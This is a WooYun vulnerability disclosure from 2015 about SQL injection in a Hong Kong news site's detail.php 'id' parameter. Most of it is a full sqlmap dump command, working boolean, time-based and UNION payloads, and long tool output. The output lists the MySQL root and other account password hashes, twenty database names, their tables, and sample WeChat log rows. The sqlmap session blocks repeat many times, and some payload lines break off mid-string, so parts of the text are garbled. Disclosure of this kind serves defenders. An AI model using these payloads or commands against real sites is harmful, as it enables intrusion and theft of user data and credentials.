当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0152956

漏洞标题:愛心新聞某處存在SQL插入攻擊(DBA權限\root密碼泄露\20個數據庫\86個表\30多萬用戶ip信息泄露\用戶微信操作記錄泄露)(香港地區)

相关厂商:愛心新聞

漏洞作者: 路人甲

提交时间:2015-11-09 12:43

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-09: 细节已通知厂商并且等待厂商处理中
2015-11-20: 厂商已经确认,细节仅向厂商公开
2015-11-30: 细节向核心白帽子及相关领域专家公开
2015-12-10: 细节向普通白帽子公开
2015-12-20: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

愛心新聞-國民教育新聞台

详细说明:

地址:http://**.**.**.**/detail.php?id=13597

python sqlmap.py -u "http://**.**.**.**/detail.php?id=13597" -p id --technique=BTU --random-agent -D wechat -T bl_weixin_log -C id,data --dump --threads=10 --start 1 --stop 5


1. DBA权限,root弱密码

current user:    'root@localhost'
current user is DBA:    True
database management system users [4]:
[*] 'calawa'@'localhost'
[*] 'maracledb'@'localhost'
[*] 'root'@'%'
[*] 'root'@'localhost'
database management system users password hashes:
[*] calawa [1]:
    password hash: *1EEEFCFA35F1ED39D62F98F2C0255E198672DB23
[*] maracledb [1]:
    password hash: *4BC9C2071D8A843BBFC4915E8B5E5B6274EDF5DD
[*] root [1]:
    password hash: *B007A8ABA91B9610AD89FEDE5F38A5415F1514F7


2. 30多万用户ip信息泄露

Database: newsmydb
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| ipcount                               | 149827  |


Database: lovetv_news
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| ipcount                               | 161064  |


3. 用户微信操作记录泄露

Database: wechat
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| bl_weixin_log                         | 108     |


选取部分进行展示:

Database: wechat
Table: bl_weixin_log
[5 entries]
+------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| id   | data                                                                                                                                                                                                                              |
+------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| 7213 | a:6:{s:10:"ToUserName";s:15:"gh_7faa910af686";s:12:"FromUserName";s:28:"oNiWWuMATRjQ9GQMLHS40jlHuTyM";s:10:"CreateTime";s:10:"1431101272";s:7:"MsgType";s:4:"text";s:7:"Content";s:3:"子";s:5:"MsgId";s:19:"6146533160709842432";} |
| 7214 | SELECT * FROM `bl_keyword` WHERE (  (`token` ='0' or token='gh_7faa910af686')  ) AND ( `keyword` = '                                                                                                                              |
| 7215 | SELECT * FROM `bl_keyword` WHERE (  (`token` ='0' or token='gh_7faa910af686')  ) AND ( `keyword_type` > 0 ) ORDER BY keyword_length desc, id desc                                                                                 |
| 7216 | SELECT * FROM `bl_keyword` WHERE (  (`token` ='0' or token='gh_7faa910af686')  ) AND ( `keyword` = '*' ) ORDER BY id desc LIMIT 1                                                                                                 |
| 7217 | Chat                                                                                                                                                                                                                              |
+------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+

漏洞证明:

---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=13597 AND 6493=6493
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: id=13597 OR SLEEP(5)
    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: id=-5998 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162767871,0x68624678677162514549626c59795a7047536b757279776d6e4871756265417748786f5274674765,0x716b787171),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.4.38
back-end DBMS: MySQL 5.0.12
current user:    'root@localhost'
current user is DBA:    True
database management system users [4]:
[*] 'calawa'@'localhost'
[*] 'maracledb'@'localhost'
[*] 'root'@'%'
[*] 'root'@'localhost'
database management system users password hashes:
[*] calawa [1]:
    password hash: *1EEEFCFA35F1ED39D62F98F2C0255E198672DB23
[*] maracledb [1]:
    password hash: *4BC9C2071D8A843BBFC4915E8B5E5B6274EDF5DD
[*] root [1]:
    password hash: *B007A8ABA91B9610AD89FEDE5F38A5415F1514F7
columns LIKE 'pass' were found in the following databases:
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=13597 AND 6493=6493
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: id=13597 OR SLEEP(5)
    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: id=-5998 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162767871,0x68624678677162514549626c59795a7047536b757279776d6e4871756265417748786f5274674765,0x716b787171),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.4.38
back-end DBMS: MySQL 5.0.12
available databases [20]:
[*] bebebehappy
[*] bolaaw
[*] calawa
[*] calawa_hobby
[*] card
[*] cards
[*] comlaw
[*] fang
[*] information_schema
[*] jobs
[*] lovetv_news
[*] mydb
[*] mysql
[*] newsmydb
[*] performance_schema
[*] survey
[*] talents
[*] test
[*] wechat
[*] wine
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=13597 AND 6493=6493
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: id=13597 OR SLEEP(5)
    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: id=-5998 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162767871,0x68624678677162514549626c59795a7047536b757279776d6e4871756265417748786f5274674765,0x716b787171),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.4.38
back-end DBMS: MySQL 5.0.12
Database: lovetv_news
[12 tables]
+--------------+
| ctrtb        |
| hkl_news     |
| ipaccess     |
| ipcount      |
| newstb       |
| newstype     |
| reportnews   |
| shareuser    |
| showdetailtb |
| showtb       |
| showtype     |
| vcount       |
+--------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=13597 AND 6493=6493
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: id=13597 OR SLEEP(5)
    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: id=-5998 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162767871,0x68624678677162514549626c59795a7047536b757279776d6e4871756265417748786f5274674765,0x716b787171),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.4.38
back-end DBMS: MySQL 5.0.12
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=13597 AND 6493=6493
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: id=13597 OR SLEEP(5)
    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: id=-5998 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162767871,0x68624678677162514549626c59795a7047536b757279776d6e4871756265417748786f5274674765,0x716b787171),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.4.38
back-end DBMS: MySQL 5.0.12
Database: wechat
[86 tables]
+-----------------------------------+
| bl_action                         |
| bl_action_log                     |
| bl_addon_category                 |
| bl_addons                         |
| bl_attachment                     |
| bl_attribute                      |
| bl_auth_extend                    |
| bl_auth_group                     |
| bl_auth_group_access              |
| bl_auth_rule                      |
| bl_card_member                    |
| bl_card_notice                    |
| bl_category                       |
| bl_channel                        |
| bl_common_category                |
| bl_common_category_group          |
| bl_config                         |
| bl_coupon                         |
| bl_credit_config                  |
| bl_credit_data                    |
| bl_custom_menu                    |
| bl_custom_reply_mult              |
| bl_custom_reply_news              |
| bl_custom_reply_text              |
| bl_document                       |
| bl_document_article               |
| bl_document_download              |
| bl_exam                           |
| bl_exam_answer                    |
| bl_exam_question                  |
| bl_extensions                     |
| bl_file                           |
| bl_follow                         |
| bl_forms                          |
| bl_forms_attribute                |
| bl_forms_value                    |
| bl_forum                          |
| bl_hooks                          |
| bl_import                         |
| bl_keyword                        |
| bl_member                         |
| bl_member_public                  |
| bl_member_public_group            |
| bl_member_public_link             |
| bl_menu                           |
| bl_model                          |
| bl_picture                        |
| bl_prize                          |
| bl_qr_code                        |
| bl_scratch                        |
| bl_shop_footer                    |
| bl_shop_product                   |
| bl_smalltools                     |
| bl_sn_code                        |
| bl_store                          |
| bl_suggestions                    |
| bl_survey                         |
| bl_survey_answer                  |
| bl_survey_question                |
| bl_test                           |
| bl_test_answer                    |
| bl_test_question                  |
| bl_tongji                         |
| bl_ucenter_admin                  |
| bl_ucenter_app                    |
| bl_ucenter_member                 |
| bl_ucenter_setting                |
| bl_update_version                 |
| bl_url                            |
| bl_userdata                       |
| bl_vote                           |
| bl_vote_log                       |
| bl_vote_option                    |
| bl_weisite_category               |
| bl_weisite_cms                    |
| bl_weisite_footer                 |
| bl_weisite_slideshow              |
| bl_weixin_log                     |
| bl_youaskservice_behavior         |
| bl_youaskservice_group            |
| bl_youaskservice_keyword          |
| bl_youaskservice_logs             |
| bl_youaskservice_user             |
| bl_youaskservice_wechat_enddate   |
| bl_youaskservice_wechat_grouplist |
| bl_youaskservice_wxlogs           |
+-----------------------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=13597 AND 6493=6493
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: id=13597 OR SLEEP(5)
    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: id=-5998 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162767871,0x68624678677162514549626c59795a7047536b757279776d6e4871756265417748786f5274674765,0x716b787171),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.4.38
back-end DBMS: MySQL 5.0.12
Database: calawa_hobby
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| moves                                 | 3414    |
| ipflow                                | 133     |
| musics                                | 102     |
| singer                                | 79      |
| moves_type                            | 30      |
| music_type                            | 8       |
| moves_tmp                             | 2       |
+---------------------------------------+---------+
Database: performance_schema
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| setup_consumers                       | 8       |
| performance_timers                    | 5       |
| setup_timers                          | 1       |
+---------------------------------------+---------+
Database: fang
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| newhouse                              | 10      |
| article                               | 4       |
| oldhouse                              | 4       |
+---------------------------------------+---------+
Database: calawa
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| newstb                                | 2677    |
| typenode                              | 128     |
| newstype                              | 38      |
| cz_music                              | 30      |
+---------------------------------------+---------+
Database: bebebehappy
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| news                                  | 144     |
| cz_music                              | 30      |
| news_type                             | 15      |
| px_course                             | 15      |
| s_video                               | 12      |
| px_inspiration                        | 9       |
| px_coursetype                         | 6       |
| admin                                 | 5       |
| manager                               | 2       |
+---------------------------------------+---------+
Database: newsmydb
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| ipcount                               | 149827  |
| vcount                                | 4257    |
| newstb                                | 3071    |
| ctrtb                                 | 650     |
| reportnews                            | 71      |
| newstype                              | 16      |
| ipaccess                              | 6       |
| showtype                              | 6       |
| showtb                                | 5       |
| hkl_news                              | 1       |
| shareuser                             | 1       |
| showdetailtb                          | 1       |
+---------------------------------------+---------+
Database: lovetv_news
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| ipcount                               | 161064  |
| vcount                                | 5264    |
| newstb                                | 4494    |
| ctrtb                                 | 982     |
| reportnews                            | 73      |
| newstype                              | 16      |
| showtype                              | 6       |
| showtb                                | 5       |
| hkl_news                              | 1       |
| ipaccess                              | 1       |
| shareuser                             | 1       |
| showdetailtb                          | 1       |
+---------------------------------------+---------+
Database: comlaw
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| r_comlaw                              | 138     |
| r_employee                            | 27      |
| member                                | 7       |
| mytest                                | 5       |
| sector                                | 4       |
+---------------------------------------+---------+
Database: test
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| dede_sys_enum                         | 3347    |
| dede_area                             | 482     |
| dede_sysconfig                        | 153     |
| dede_arctiny                          | 125     |
| dede_archives                         | 124     |
| dede_co_mediaurls                     | 83      |
| dede_addonarticle                     | 80      |
| dede_uploads                          | 79      |
| dede_co_htmls                         | 73      |
| dede_co_urls                          | 73      |
| dede_addonimages                      | 28      |
| dede_arccache                         | 22      |
| dede_arctype                          | 20      |
| dede_myad                             | 20      |
| dede_stepselect                       | 15      |
| dede_scores                           | 12      |
| dede_mytag                            | 10      |
| dede_addonshop                        | 8       |
| dede_addonsoft                        | 8       |
| dede_arcatt                           | 8       |
| dede_arcrank                          | 8       |
| dede_flinktype                        | 8       |
| dede_plus                             | 8       |
| dede_member                           | 7       |
| dede_sys_module                       | 7       |
| dede_channeltype                      | 6       |
| dede_flink                            | 6       |
| dede_member_flink                     | 6       |
| dede_search_keywords                  | 6       |
| dede_feedback                         | 5       |
| dede_co_note                          | 4       |
| dede_payment                          | 4       |
| dede_shops_delivery                   | 4       |
| dede_admintype                        | 3       |
| dede_co_onepage                       | 3       |
| dede_member_msg                       | 3       |
| dede_moneycard_type                   | 3       |
| dede_tagindex                         | 3       |
| dede_freelist                         | 2       |
| dede_member_model                     | 2       |
| dede_member_stow                      | 2       |
| dede_member_stowtype                  | 2       |
| dede_member_vhistory                  | 2       |
| dede_sys_set                          | 2       |
| dede_admin                            | 1       |
| dede_arcmulti                         | 1       |
| dede_guestbook                        | 1       |
| dede_homepageset                      | 1       |
| dede_member_group                     | 1       |
| dede_member_person                    | 1       |
| dede_member_space                     | 1       |
| dede_member_tj                        | 1       |
| dede_member_type                      | 1       |
| dede_softconfig                       | 1       |
| dede_vote                             | 1       |
+---------------------------------------+---------+
Database: talents
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| addresstb                             | 944     |
| basicinfo                             | 416     |
| family                                | 251     |
| events                                | 124     |
| resume                                | 62      |
| contract                              | 34      |
| typetb                                | 30      |
| typetb_copy                           | 30      |
| holiday                               | 7       |
| upost                                 | 2       |
| admin                                 | 1       |
+---------------------------------------+---------+
Database: wechat
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| bl_attribute                          | 509     |
| bl_auth_rule                          | 219     |
| bl_menu                               | 130     |
| bl_weixin_log                         | 108     |
| bl_model                              | 59      |
| bl_config                             | 43      |
| bl_addons                             | 31      |
| bl_credit_config                      | 19      |
| bl_credit_data                        | 17      |
| bl_hooks                              | 16      |
| bl_action                             | 12      |
| bl_custom_menu                        | 10      |
| bl_auth_extend                        | 8       |
| bl_addon_category                     | 4       |
| bl_tongji                             | 4       |
| bl_auth_group                         | 2       |
| bl_ucenter_member                     | 2       |
| bl_action_log                         | 1       |
| bl_category                           | 1       |
| bl_custom_reply_text                  | 1       |
| bl_document_article                   | 1       |
| bl_follow                             | 1       |
| bl_keyword                            | 1       |
| bl_member                             | 1       |
| bl_member_public                      | 1       |
| bl_member_public_link                 | 1       |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| COLUMNS                               | 3906    |
| STATISTICS                            | 642     |
| KEY_COLUMN_USAGE                      | 466     |
| PARTITIONS                            | 446     |
| TABLES                                | 446     |
| TABLE_CONSTRAINTS                     | 401     |
| SESSION_VARIABLES                     | 326     |
| GLOBAL_VARIABLES                      | 315     |
| GLOBAL_STATUS                         | 310     |
| SESSION_STATUS                        | 310     |
| COLLATION_CHARACTER_SET_APPLICABILITY | 195     |
| COLLATIONS                            | 195     |
| USER_PRIVILEGES                       | 55      |
| SCHEMA_PRIVILEGES                     | 54      |
| CHARACTER_SETS                        | 39      |
| PLUGINS                               | 20      |
| SCHEMATA                              | 20      |
| ENGINES                               | 9       |
| PROCESSLIST                           | 6       |
| INNODB_CMP                            | 5       |
| INNODB_CMP_RESET                      | 5       |
| INNODB_CMPMEM                         | 5       |
| INNODB_CMPMEM_RESET                   | 5       |
+---------------------------------------+---------+
Database: bolaaw
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| ofproperty                            | 28      |
| ofsecurityauditlog                    | 19      |
| blhappyvalue                          | 13      |
| blyyxl                                | 13      |
| ofpresence                            | 8       |
| ofuser                                | 8       |
| ofid                                  | 5       |
| blhappybase                           | 4       |
| ofpubsubdefaultconf                   | 2       |
| ofmucservice                          | 1       |
| ofpubsubaffiliation                   | 1       |
| ofpubsubnode                          | 1       |
| ofversion                             | 1       |
+---------------------------------------+---------+
Database: mysql
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| help_relation                         | 1027    |
| help_topic                            | 508     |
| help_keyword                          | 464     |
| help_category                         | 38      |
| `user`                                | 4       |
| db                                    | 3       |
| func                                  | 1       |
| proxies_priv                          | 1       |
+---------------------------------------+---------+
Database: cards
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| `user`                                | 1       |
+---------------------------------------+---------+
Database: survey
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| `user`                                | 1       |
| question                              | 1       |
+---------------------------------------+---------+
Database: jobs
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| jobsname                              | 652     |
| jobstype                              | 42      |
| com_industry                          | 39      |
| jobs                                  | 7       |
| jobsuser                              | 6       |
| jobcom                                | 4       |
| jobarticle                            | 2       |
| jobresume                             | 2       |
+---------------------------------------+---------+
Database: card
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| bl_picture                            | 276     |
| bl_auth_rule                          | 215     |
| bl_document                           | 172     |
| bl_document_card                      | 172     |
| bl_menu                               | 111     |
| bl_action_log                         | 66      |
| bl_config                             | 27      |
| bl_attribute                          | 26      |
| bl_auth_extend                        | 14      |
| bl_action                             | 11      |
| bl_hooks                              | 11      |
| bl_addons                             | 7       |
| bl_category                           | 6       |
| bl_auth_group                         | 3       |
| bl_channel                            | 3       |
| bl_member                             | 2       |
| bl_model                              | 2       |
| bl_ucenter_member                     | 2       |
| bl_auth_group_access                  | 1       |
+---------------------------------------+---------+
Database: mydb
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| rptodopic                             | 9602    |
| ipcount                               | 8370    |
| chappyshare                           | 6716    |
| rptodotb                              | 6705    |
| happyshare                            | 3206    |
| newstb                                | 2270    |
| projectpic                            | 852     |
| com3_todo                             | 593     |
| todotb                                | 434     |
| projecttb                             | 433     |
| comstb                                | 423     |
| ctrtb                                 | 327     |
| admin                                 | 203     |
| producttb                             | 149     |
| pruton_news                           | 115     |
| kehutb                                | 100     |
| assetstb                              | 90      |
| assetspic                             | 84      |
| pruton_englishnews                    | 38      |
| com3_admin                            | 31      |
| ggkehutb                              | 28      |
| typetb                                | 26      |
| calawarptype                          | 25      |
| comstypetb                            | 25      |
| ggkehutypetb                          | 25      |
| kehutypetb                            | 25      |
| mistypetb                             | 25      |
| newstype                              | 16      |
| mistb                                 | 15      |
| basicinfo                             | 13      |
| comuserpic                            | 10      |
| materialtb                            | 9       |
| comroot                               | 7       |
| addresstb                             | 4       |
| com4_admin                            | 4       |
| com5_admin                            | 4       |
| productpic                            | 4       |
| comtb                                 | 3       |
| ipaccess                              | 1       |
| mytb                                  | 1       |
| wyhtodotb                             | 1       |
+---------------------------------------+---------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=13597 AND 6493=6493
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: id=13597 OR SLEEP(5)
    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: id=-5998 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162767871,0x68624678677162514549626c59795a7047536b757279776d6e4871756265417748786f5274674765,0x716b787171),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.4.38
back-end DBMS: MySQL 5.0.12
columns LIKE 'pass' were found in the following databases:
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=13597 AND 6493=6493
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: id=13597 OR SLEEP(5)
    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: id=-5998 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162767871,0x68624678677162514549626c59795a7047536b757279776d6e4871756265417748786f5274674765,0x716b787171),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.4.38
back-end DBMS: MySQL 5.0.12
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=13597 AND 6493=6493
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: id=13597 OR SLEEP(5)
    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: id=-5998 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162767871,0x68624678677162514549626c59795a7047536b757279776d6e4871756265417748786f5274674765,0x716b787171),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.4.38
back-end DBMS: MySQL 5.0.12
Database: lovetv_news
Table: ipcount
[4 columns]
+--------+-------------+
| Column | Type        |
+--------+-------------+
| id     | numeric     |
| ip     | non-numeric |
| page   | non-numeric |
| site   | non-numeric |
+--------+-------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=13597 AND 6493=6493
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: id=13597 OR SLEEP(5)
    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: id=-5998 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162767871,0x68624678677162514549626c59795a7047536b757279776d6e4871756265417748786f5274674765,0x716b787171),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.4.38
back-end DBMS: MySQL 5.0.12
Database: wechat
Table: bl_weixin_log
[2 columns]
+--------+-------------+
| Column | Type        |
+--------+-------------+
| data   | non-numeric |
| id     | numeric     |
+--------+-------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=13597 AND 6493=6493
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: id=13597 OR SLEEP(5)
    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: id=-5998 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162767871,0x68624678677162514549626c597sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=13597 AND 6493=6493
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: id=13597 OR SLEEP(5)
    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: id=-5998 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162767871,0x68624678677162514549626c597sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=13597 AND 6493=6493
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: id=13597 OR SLEEP(5)
    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: id=-5998 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162767871,0x68624678677162514549626c597sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=13597 AND 6493=6493
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: id=13597 OR SLEEP(5)
    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: id=-5998 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162767871,0x68624678677162514549626c59795a7047536b757279776d6e4871756265417748786f5274674765,0x716b787171),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.4.38
back-end DBMS: MySQL 5.0.12
Database: wechat
Table: bl_weixin_log
[5 entries]
+------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| id   | data                                                                                                                                                                                                                              |
+------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| 7213 | a:6:{s:10:"ToUserName";s:15:"gh_7faa910af686";s:12:"FromUserName";s:28:"oNiWWuMATRjQ9GQMLHS40jlHuTyM";s:10:"CreateTime";s:10:"1431101272";s:7:"MsgType";s:4:"text";s:7:"Content";s:3:"子";s:5:"MsgId";s:19:"6146533160709842432";} |
| 7214 | SELECT * FROM `bl_keyword` WHERE (  (`token` ='0' or token='gh_7faa910af686')  ) AND ( `keyword` = '                                                                                                                              |
| 7215 | SELECT * FROM `bl_keyword` WHERE (  (`token` ='0' or token='gh_7faa910af686')  ) AND ( `keyword_type` > 0 ) ORDER BY keyword_length desc, id desc                                                                                 |
| 7216 | SELECT * FROM `bl_keyword` WHERE (  (`token` ='0' or token='gh_7faa910af686')  ) AND ( `keyword` = '*' ) ORDER BY id desc LIMIT 1                                                                                                 |
| 7217 | Chat                                                                                                                                                                                                                              |
+------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+

修复方案:

上WAF。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-11-20 15:33

厂商回复:

Referred to related parties.

最新状态:

暂无